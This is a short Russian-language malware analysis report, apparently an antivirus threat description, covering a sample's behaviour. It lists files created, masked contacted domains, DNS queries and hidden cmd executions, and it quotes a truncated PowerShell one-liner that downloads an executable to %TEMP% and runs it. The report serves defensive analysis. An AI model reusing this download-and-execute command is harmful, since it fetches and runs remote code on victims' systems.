Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $ywygqtsyi как %temp%\qlnwx_7.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Bywtlbhoau7([String] $ywygqtsyi){(New-Object System.Net.WebClient).DownloadFile($ywygqtsyi,''%TEMP%\Qlnwx_7.exe'');Start-Process ''%TEMP%\Qlnwx_7.exe'';}tr...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\rbvcvm.bat
Сетевая активность
Подключается к
- 'th####ingcel.com':80
TCP
Запросы HTTP GET
- http://th####ingcel.com/kas44.png
UDP
- DNS ASK th####ingcel.com
- DNS ASK ev#####psikolojisi.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Bywtlbhoau7([String] $ywygqtsyi){(New-Object System.Net.WebClient).DownloadFile($ywygqtsyi,''%TEMP%\Qlnwx_7.exe'');Start-Process ''%TEMP%\Qlnwx_7.exe'';}tr...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rbvcvm.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\rbvcvm.bat" "
